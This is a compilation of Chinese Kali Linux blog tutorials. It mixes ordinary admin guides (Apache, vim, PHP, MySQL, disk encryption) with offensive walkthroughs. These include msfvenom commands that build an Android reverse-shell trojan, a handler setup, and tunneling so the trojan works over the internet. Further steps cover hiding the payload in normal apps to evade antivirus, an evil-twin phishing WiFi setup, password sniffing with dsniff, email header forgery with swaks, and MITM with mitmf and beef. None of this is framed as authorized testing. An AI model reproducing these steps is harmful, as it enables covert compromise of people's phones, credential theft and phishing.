建站VPS工具综合杂谈

kalilinux的图形界面和文本界面的切换 文件修改开机是否图形配置： 配置图行界面的文件是 vi /etc/default/grub 找到：GRUB_CMDLINE_LINUX_DEFAULT="quiet"，应该是在第11行。 复制本行然后把quiet替换成text。 把本行注释掉（以免以后想改回来时不知道怎么改回来）。 保存后 执行sudo update-grub命令后 重启即可 如果想kali每次启动是文本模式可以修改如下文件： vi /etc/X11/default-display-manager 把里面内容/usr/sbin/gdm3改为false之后重启会以文本模式登录，想改回图形就把false还原回/usr/sbin/gdm3 快捷键切换（推荐）：ctrl+alt+F1文本模式ctrl+alt+F7图形界面

普通版在 kali中我们可以利用 msfvenom来生成一个Android木马。命令如下： msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > TPLINK.apk这样便生成了一个名为 TPLINK.apk的Android木马。 然后我们配合 msfcosole进行攻击即可。 msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LPORT 5555 exploit手机端安装并执行，成功获得shell。 一些另外的玩法给手机播放视频和音频文件（需更新到最新版的msf）命令格式： paly /root/xxx.mp3 mp4 修改手机壁纸background use post/multi/manage/set_wallpaper sessions set sessions id set WALLPAPER_FILE JPG exploit晋级玩法利用 armitage图形化管理工具 可视化的文件管理 骨灰级外网木马我们可以利用花生壳进行端口映射完成外网木马的渗透测试，添加端口如下！ 然后在kali中设置花生壳的端口和ip地址即可。 那么！你还有那些另类的玩法呢？一起在下方交流吧。 木马免杀对于以上的木马，是无法通过杀毒软件的查杀的，我们可以将 payload加入到正常的APP中，来起来免杀的效果。 命令:…

一：复制/etc/apache2/sites-available目录下的000-default.conf文件sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/priess.conf 二：将DocumentRoot /var/www/html 改为自己的目录，例如：DocumentRoot /home/huoty/mysite 清空里面原来的文件，复制下面内容 <VirtualHost *:80> DocumentRoot /var/www/html/ #原来的默认路劲 ServerName [url=www.baidu.com]www.baidu.com[/url] </VirtualHost> <VirtualHost *:80> DocumentRoot /var/www/priess/#新的路劲 ServerName [url=www.taobao.com]www.taobao.com[/url] </VirtualHost>也就是说：当我访问www.baidu.com时候跳转到html这个文件夹下面的站点。当我访问www.taobao.com的时候跳转到priess下的站点。 三：设置etc/host文件 四：将priess.conf 软链到sites-enabled：$ sudo ln -s /et…

密码自古以来就是人类保护自己的一种方式。从锁?的发明到摩斯电码、直到现在的各种加密算法。密码已经成为当代人生活中不可缺少又非常重要的一种工具，更或者说是一种人们的生活方式。而破解密码也已经成为 大佬 和 小学生 共同交流的话题！ 密码破解前期的准备常见名词解释| 名词 | 释意 | | - - -| - - - | | 字典 | 即一些密码的集合，格式一般为 txt | | 暴力破解 | 一种破解方式，通过已知密码字典分别进行尝试，成功率和字典有关。 | | 掩码破解 | 由于受到字典的限制无法破解成功，可用 猜测的方式破解。如 ?a?a?a?a 代表 4位 0~9的密码（不同程序，表示方法可能不同。）但是对计算机的要求比较高 | 常见端口信息收集| 端口 | 程序 | |- - - |- - - | | 21 | FTP端口 用于上传文件到服务器 | | 22 | SSH SFTP端口，用于登录服务器执行命令 | | 3306 | mysql端口 （远程服务器需要账号授权） | | 3389 | Windwos远程登录端口 | | 5800 | VNC端口相当于Windows的远程登录 | 判断端口是否开启利用 nmap即可查看目标端口是否开启 nmap -T4 -A 192.168.1.1/24扫描局域网内所有设备开启的相关端口，当然我们也可以中 msfconsole nessus等相关神器进行信息收集，但这里不再详讲！ 如下图 这台 ASUS RT-N56U 设备开启了 22 80等端口。 常见的破解方式01压缩文件的暴力破解(…

平时在使用Linux学习或者编辑时，总离不开文件的编辑。不像Windows哪样，有各种各样的编辑器。那么我们在Linux环境中常用那些编辑器呢？ 01 VimVim是从 vi 发展出来的一个文本编辑器。代码补完、编译及错误跳转等方便编程的功能特别丰富，在程序员中被广泛使用。 使用教程基本上 vi/vim 共分为三种模式，分别是命令模式，输入模式和底线命令模式。 命令模式： 此状态下敲击键盘动作会被Vim识别为命令，而非输入字符。比如我们此时按下i，并不会输入一个字符，i被当作了一个命令。 常用的几个命令： 命令释义i切换到输入模式，以输入字符。x删除当前光标所在处的字符。:切换到底线命令模式输入模式 在命令模式下按下i就进入了输入模式。 按键释义ENTER回车键，换行BACK SPACE删除光标前一个字符DEL删除光标后一个字符方向键在文本中移动光标HOME/END移动光标到行首/行尾Insert切换光标为输入/替换模式，光标将变成竖线/下划线ESC退出输入模式，切换到命令模式底线命令模式 在命令模式下按下:（英文冒号）就进入了底线命令模式。 按键释义:q退出程序:w保存文件:wq保存并退出vim键盘图 基本实例创建文本 vim bbskali.txt这样我们便创建了名为bbskali.txt的文档，当然可以创建所有的文本格式，如php jsp doc bat html都行。 输入i进入输入\编辑模式 然后输入我们想要的内容，然后按:退出编辑模式，输入wq保存并关闭文件。 高级功能搜索替换 按键释义/p向光标之下寻找一个名称为 p 的…

网卡一芯片为3070 优点：最要用来进行WiFi钓鱼。使用此网卡相比其他的网卡而言，钓鱼页面跳转是最快的。 网卡二芯片为:8187 优点：发送功率比较高，用传统的破解WiFi的方式（如抓包）等比较好用。 缺点：进行WiFi钓鱼时，钓鱼页面的跳转极其缓慢。 网卡三芯片：8812au 优点：支持5G/HZ 支持WiFi钓鱼 缺点：安装驱动比较困难 官方驱动安装教程 apt-get update apt install realtek-rtl88xxau-dkms

在前期的一篇文章中，说到了利用kali进行搭建恶意WiFi的文章，但是难度系数相对来说比较大。对于新入门的小伙伴而言感到无从下手。经过几天的努力，脚本版的上线了。 运行环境kali2020usb无线网卡功能介绍一键开启热点 无需繁琐配置支持连接热点后，跳转到钓鱼页面。使用将 site 文件下的文件复制到 /var/www/html 下 在终端执行下面命令即可 ./wifi.sh wlan0 eth0 apname参数说明： wlan0 你的无线网卡 通过 ifconig 查看，有的是 wlan1 需按实际情况修改。 eth0 本地网卡 ap name 自定义热点ap名称 使用演示 手机端效果

dsniffdsniff 是一个密码侦测工具，他能够自动分析端口上收到的某些协议的数据包，并获取相应的密码。 dnisff 支持的协议有 FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL。 dsniff 使用dsniff [-c] [-d] [-m] [-n] [expression] 注意：这里所有的 expression 都是代表 TCPDUMP 的表达式，指定对哪些数 据包进行攻击 urlsnarfurlsnarf可以嗅探 HTTP 请求报文的内容，并以 CLF (Common Log Format）通用日志格式 输出 使用 urlsnarf[-n] [-i interface] [[-v] pattern[expression]] webspywebspy 指定一个要嗅探的主机，如果指定主机发送 HTTP 请求，打开网页，webspy 也会通 过 netscape 浏览…

Swaks是一个功能强大，灵活，可编写脚本，面向事务的SMTP测试工具， 目前Swaks托管在私有svn存储库中。官方项目页面是http://jetmore.org/john/code/swaks/牛刀小试kali下默认自带，无需安装。 01 测试邮箱的连通性 swaks --to [email protected] 返回250ok，说明该邮箱存在，并且可以正常收信。 利用SMTP发送邮件 swaks --to 收件箱@qq.com --from 发件箱@163.com --body HI这是 由kali发送到您邮件中的内容 --header "Subject: kali论坛 致力于网络安全" --server smtp.163.com -p 25 -au 发件箱@163.com -ap SMTP密码在测试之前，在163官网开启smtp 命令说明： --from [email protected] //发件人邮箱； --ehlo qq.com //伪造邮件ehlo头，即是发件人邮箱的域名。提供身份认证 --body "http://www.baidu.com" //引号中的内容即为邮件正文； --header "Subject:hello" //邮件头信息，subject为邮件标题 --data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件，再作为正常邮件发送 发送附件 swaks --to 收件箱@qq.com --from 发件箱@163.com --body HI这是 由kali发送到您邮件中的内容 -…

在本文中，我们将回顾一些最常用的 Linux 网络管理命令工具和程序。并对这些命令进行解释和说明，以便我们更好的掌握。 01 ifconfig命令ifconfig是一个用于网络接口配置的命令行接口工具。也用于在系统启动时初始化网卡接口，也可用于为接口分配 IP 地址并按需启用或禁用接口。它还用于查看当前活动接口的 IP地址、硬件MAC 地址以及 MTU（最大传输单元）大小。 示例ifconfig 要列出当前可用的所有接口，无论是up还是down，请后面加-a参数。 ifconfig -a 要将 IP 地址分配给接口，请使用以下命令。 ifconfig eth0 192.168.56.5 netmask 255.255.255.0激活网络接口。 ifconfig up wlan0要停用或关闭网络接口 ifconfig down wlan0注意： 虽然ifconfig是一个很棒的工具，但它现在已经过时（不推荐使用），它的替代品是下面解释的ip 命令。 02 IP命令ip 命令是另一个有用的命令行实用程序，用于显示和操作路由、网络设备、接口。它是ifconfig和许多其他网络命令的替代品。 示例ip addr show 将 IP 地址临时分配给特定网络接口 ( eth0 ) ip addr add 192.168.56.1 dev eth0要从网络接口 ( eth0 ) 中删除分配的 IP 地址 ip addr del 192.168.56.15/24 dev eth0显示内核中的当前邻居表 ip neigh 03 ifup、ifdown 和…

通过本文，我们一起来看看。如何黑掉别人的桌面壁纸吧。 实验环境kali LinuxWindows小米手机（Android12）模块介绍set_wallpaper这个模块非常简单，因为它所做的就是在指定的会话上设置桌面壁纸背景。当我们运行模块时，将攻击者电脑上的图片上传到受害者系统，然后设置为受害者的壁纸。 更改Windows壁纸在Kali中终端并键入 msfconsole 以加载 Metasploit 框架。在目标主机获得shell后，将当前的session会话信息放到后台。 然后执行下面命令 use post/multi/manage/set_wallpaper set session 1 set wallpaper_file /root//1.jpg exploit这样便完成了对windows桌面背景的修改。 更改安卓上的壁纸首先，在Android系统上获取一个meterpreter会话。 还是和前面一样，利用background命令，将当前会话放置到后台运行。然后使用set_wallpaper模块。 use post/multi/manage/set_wallpaper set session 1 set wallpaper_file /root/Desktop/1.jpeg exploit效果 视频演示

利用adb命令，我们可以连接Android手机，在kali中如何配置安装呢？ 安装adb我们利用apt命令安装即可 apt-get install adb开启手机的usb试调 测试连接adb devices 显示手机中的所有应用adb shell pm list packages 查看手机电池情况adb shell dumpsys battery屏幕截图感觉这个功能很实用，很隐蔽。 adb exec-out screencap -p > bbskali.png 录制屏幕录制屏幕以 mp4 格式保存到 /sdcard： adb shell screenrecord /sdcard/filename.mp4需要停止时按 Ctrl-C，默认录制时间和最长录制时间都是 180 秒。 如果需要导出到电脑： adb pull /sdcard/filename.mp4

配置外网环境我这里用的是http://www.ngrok.cc其他的自行试用 这个可以免费 。 远程端口随便填（反正你填啥都会提示你端口已被使用：）） 本地端口填写你的kali ip地址 也就是攻击机的地址 端口随意 不懂4444即可! 填写完后效果如下： 然后点击开通 下载客户端根据你kali的版本下载 我的是64位的。 运行客户端先看看你的clientid 在隧道管理——隧道ip中查看，如图： 记录好id后，运行下面命令 ./sunny clientid 你的id 查看外网的ip我们ping下赠送域名的ip地址 得到ip地址 制作外网shellmsfvenom -p android/meterpreter/reverse_tcp LHOST=外网ip LPORT=外网端口 R > 666.apk**ps:**外网ip就是刚才ping出来的域名的ip地址，外网端口，就是你在添加隧道的时候，设置的端口。 生成之后，配置msf msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 内网ip set LPORT 内网端口 exploit填坑： 生成木马的时候，用的是外网ip和端口。配置msf的时候，我们用内网的ip和端口（很重要） 完成后，手机连接4G网络，运行木马。成功得到shell 看看手机的ip地址 [dplayer url="http://js.bbskali.cn/ji.flv" …

上期，写了一篇kali基础的相关文章，反响还错。不少小伙伴让我多出几篇基础教程。这不今天的教程呈上！ kali查看网卡型号、驱动版本、队列数查看网卡生产厂家和型号的基本信息 lspci查看网卡生产厂家和型号的详细信息 lspci -vvv查看网卡驱动 lspci -vvv查看网卡驱动版本 ethtool -i eth0查看网络接口队列数 cat /proc/interrupts | grep eth0 kali如何禁止用户登录1.修改用户配置文件/etc/shadow 将第二栏设置为*，如下。那么该用户就无法登录。但是使用这种方式会导致该用户的密码丢失，也就是当你再次允许他登录的时候，你还得让他重新设置密码。[再次启用这个帐号的方法是把*去掉就可以了 username:*:14245:0:99999:7:::2.使用命令usermod 这个方式简单又实用，而且没有1中的副作用。 usermod -L username ##Lock 账户名username usermod -U username ##Unlock 账户名usernamekali中配置静态IP修改下面的配置文件 /etc/network/interfaces修改如下： auto eth0 #iface eth0 inet dhcp iface eth0 inet static address 192.168.1.6 netmask 255.255.255.0 gateway 192.168.1.1参数说明： iface eth0…

Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用，并利用 beef 强大的 hook 脚本来控制目标客户端。下面让我们一起看看如何在 Kali2.0上安装使用 Mitmf 。默认在2.0上并未安装，在之前的版本有安装。 首先，我们先进行工具依赖包的安装。打开 terminal 终端，输入如下命令: apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file 以上结果出现一些安装包无法安装的情况，这里我们无需理会，继续我们的下一步操作即可。 依赖包安装完成后，就可以开始安装Mitmf 了、输入命令: apt-get install mitmf 不过这样安装完成后 mitmf 依然无法正常使用它的一些功能。因为缺少了 twisted 的版本兼容性。我们来安装适合 mitmf 的 twisted 。如果你已经安装过，那么先卸载之前的版本。输入命令: pip uninstall twisted shell 并用 wget 命令进行下载。wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2 安装 twisted 。pip install…

Nessus介绍Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。 下载安装包因为kali之基于Debian深度开发，我们按照相应是系统位数下载即可。 需要注意的是i386是32位系统。 温馨提示！ 请用Google浏览器下载因为！因为！因为！因为！因为！贼J快！快！快！快！快！快！快！ 安装贼J 13简单，把下载的Nessus-8.6.0-debian6_amd64.deb复制到kali。执行命令即可 dpkg -i Nessus-8.6.0-debian6_amd64.deb 启动服务sudo service nessusd startps:注意nessusd是启动服务，而不是启动程序。 获取激活码方法一 然后打开这个网页：https://www.tenable.com/products/nessus-home 随便输入，邮箱保证能收到邮件就好了。 方法二 运行程序后，在软件框输入 在邮箱中获取激活码 运行程序在kali的浏览器中输入https://localhost:8834/ 会提示证书错误信息，添加证书即可。 效果如下： 选择第一个 如果你选择了第一种方法获取激活码，这里直接点击跳过即可。 输入刚才我们邮箱中的激活码点击下一步 然后是漫长的等待…… 核能提示！ 如果失败！请多次重试！重试！重试！（因为贼J 13慢） 如果你运气好的话，很安装成功哦~ 输入刚才我们设置的密码，登录系统！

PHP世界上最美的语言 ?，在kali中怎样安装呢？在kali2020中，源里面已经集成了 php7.3我们只需要利用 apt-get install php7.3即可完成对7.3版本的安装。那么如何安装 7.4呢？ 添加源首先在 etc/apt/下新建一个文件夹 trusted.gpg.d sudo apt -y install lsb-release apt-transport-https ca-certificates sudo wget -O /etc/apt/trusted.gpg.d/php.gpg https://packages.sury.org/php/apt.gpg写入源 echo "deb https://packages.sury.org/php/ buster main" | sudo tee /etc/apt/sources.list.d/php.list更新源sudo apt update安装php7.4到 Kali Linux.sudo apt -y install php7.4验证php -v PHP 7.4.3 (cli) (built: Feb 20 2020 14:15:45) ( NTS ) Copyright (c) The PHP Group Zend Engine v3.4.0, Copyright (c) Zend Technologies with Zend OPcache v7.4.3, Copyright (c), by Zend Technologies一个强大的PHP离…

一：下载64位地址：https://github.com/oguzhaninan/S ... cer_1.0.9_amd64.deb 32位地址：https://github.com/oguzhaninan/S ... acer_1.0.6_i386.deb 二：安装下载后，将文件复制到kali 执行命令安装 dpkg -i stacer_1.0.9_amd64.deb三：运行终端命令 Stacer CPU监控

kali linux是默认安装java环境的，那么他该怎么样运行其他平台下的java软件呢？一：我们先在windows下编写一个小小的java程序。 附上源码： package kali; import java.awt.BorderLayout; import java.awt.EventQueue; import javax.swing.JFrame; import javax.swing.JOptionPane; import javax.swing.JPanel; import javax.swing.border.EmptyBorder; import javax.swing.JTextField; import javax.swing.JPasswordField; import javax.swing.JButton; import java.awt.event.ActionListener; import java.awt.event.ActionEvent; public class Kinux extends JFrame { private JPanel contentPane; private JTextField textField; private JPasswordField passwordField; /** * Launch the application. */ public …

说明：前几天看到了个很强大的新项目，py12306购票助手，支持分布式，多账号，多任务购票，还带了很方便的Web管理界面，支持各种通知，比如微信，电话语音，邮件等。现在貌似到了抢票的季节了，所以博主就分享一下该工具的手动安装和Docker安装，有需求的可以用下。功能多日期查询余票自动打码下单用户状态恢复电话语音通知多账号、多任务、多线程支持单个任务多站点查询分布式运行Docker支持动态修改配置文件邮件通知Web管理页面微信消息通知 手动安装Github地址：https://github.com/pjialin/py12306 环境要求： Python 3.6以上的版本。 安装Python 3.6sudo apt-get update sudo apt-get install python3.6查看是否安装完成 python3 --version 安装pip3apt-get install python3-pip -y安装完成pip3后我们安装依赖环境 git clone https://github.com/pjialin/py12306 cd py12306 pip3 install -r requirements.txt配置程序复制配置文件 cp env.py.example env.py然后编辑该配置文件，填入你的账号等信息，建议使用FTP工具访问VPS后编辑该文件。 部分配置说明，其它配置就参考配置文件里面的说明，挺详细了 1、自动打码 目前支持免费打码，和若快打码 注：免费打码无法保证持续可用，如失效请手动切换到若快平…

如何在kali下快速搭建钓鱼WiFi呢？全网最简单最详细的教程核能来袭。一起来看看吧。 准备USB无线网卡（推荐8187 3070）hostapd dnsmasq apache2kali2020(最新版) 配置无线网卡在终端执行 ifconfig查看是否有 wlan0如果存在，我们需要激活为监听模式。执行命令： airmon-ng start wlan0 配置hostapd在终端执行 vim hostapd.conf写入下面内容 interface=wlan0mon driver=nl80211 ssid=Chinanet #无线名称 随意即可 hw_mode=g channel=6 macaddr_acl=0 ignore_broadcast_ssid=0 配置dnsmasq文件终端执行 vim dnsmasq.conf写入内容如下： interface=wlan0mon dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h dhcp-option=3, 192.168.1.1 dhcp-option=6, 192.168.1.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0.0.1 配置防火墙和端口转发iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --…

KALI的磁盘加密是用LUKS(Linux Unified Key Setup)加密的，这个软件不是kali/debian/ubuntu上特有的，各版本的linux都支持，使用AES加密，格式和truecrypt是兼容的，可以在加密后的磁盘上创建任意文件系统，但是加密后的磁盘不能直接挂载，必须要将分区映射到/dev/mapper下，所以为了方便管理磁盘，操作系统安装时都采用了 LVM on LUKS的方式，也就是全盘加密并在上面创建lvm分区。 LUKS的特点： 简单，安全，高效 支持全盘或分区加密 加密密匙独立于密码，支持多个密码，可以直接更改密码，不需要重新加密磁盘或分区 底层加密，要先解密后才能加载文件系统 kali在安装是加密磁盘和LVM安装程序都自动搞好了，采用的是全盘加密，不用手动搞。改LUKS的解密密码，要先加一个新密码，在删除原来的旧密码即可。千万不要直接删除原来密码（别问我是怎么知道的 TT～） 添加新密码： cryptsetup luksAddKey /dev/sda5先输入已经存在的密码，通过认证后在输入要加的新密码。 移除旧密码： cryptsetup luksRemoveKey /dev/sda5之后输入要删除的密码就可以直接移除了。 如果系统只有一个密码时，也是可以删掉的，这时会提示： root@kali:~#cryptsetup luksRemoveKey /dev/sda5 Enter passphrase to be deleted: WARNING! This is the last keyslo…

在我们更新kali时，由于网络、断电、异常关机、或其他的人为因素导致kali更新没有完成。而直接关机，重启后发现界面黑屏只有一个光标闪动。此时怎么办呢？ 解决方法同时按住ctrl+ALT+F2出现命令行登录窗口。 我们登录系统后再次执行apt-get upgrade查看提示，根据提示解决即可！ 或者执行dpkg --configure -a即可完美解决

一：首先查看磁盘使用情况df linux中df命令详解 -a 显示所有文件系统的磁盘使用情况，包括0块（block）的文件系统，如/proc文件系统。 -k 以k字节为单位显示。 -i 显示i节点信息，而不是磁盘块。 -t 显示各指定类型的文件系统的磁盘空间使用情况。 -x 列出不是某一指定类型文件系统的磁盘空间使用情况（与t选项相反）。 -T 显示文件系统类型。 二：清理垃圾sudo apt-get autoclean #清理旧版本的软件缓存 sudo apt-get clean #清理所有软件缓存 sudo apt-get autoremove #删除系统不再使用的孤立软件

kali是自带mysql服务，今天我们来看看，如何配置mysql。 启动myslqservice mysql start初始化密码执行命令 mysql_secure_installation 回车后输入你自己的密码 然后一路Y即可 如图，出现Thanks for using MariaDB!则说明初始化成功。 登录数据库mysql -u root -p这时，你会蛋疼的发现直接回车便可以登录，而不需要密码。所以我们需要执行下面命令。登录数据库（回车直接登录） use mysql; update user set plugin="";这样就可以用刚才设置的密码登录数据库。